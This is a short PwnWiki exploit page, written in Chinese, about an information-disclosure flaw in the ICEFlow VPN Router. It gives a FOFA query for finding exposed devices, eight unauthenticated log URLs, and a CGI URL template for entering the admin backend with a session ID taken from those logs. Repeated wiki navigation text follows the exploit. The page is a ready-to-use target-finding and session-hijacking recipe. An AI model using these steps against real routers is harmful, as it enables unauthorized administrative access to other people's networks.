ICEFlow VPN 信息洩露漏洞

FOFA

title="ICEFLOW VPN Router"

漏洞利用

可訪問的日誌 Url

系統日誌 http://url/log/system.log
VPN日誌 http://url/log/vpn.log
訪問日誌 http://url/log/access.log
告警日誌 http://url/log/warn.log
錯誤日誌 http://url/log/error.log
調試日誌 http://url/log1/debug.log
移動用戶日誌 http://url/log/mobile.log
防火牆日誌 http://url/log/firewall.log

根據日誌信息獲得session後，可利用實時登錄系統管理後台：

http://xxx.xxx.xxx.xxx/cgi-bin/index?oid=10&session_id=xxxxxxxxxxxxxx&l=0

Anonymous

Search

ICEFlow VPN 信息洩露漏洞

Namespaces

More

Page actions

FOFA

漏洞利用

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

ICEFlow VPN 信息洩露漏洞

FOFA

漏洞利用

Navigation

Wiki tools

Page tools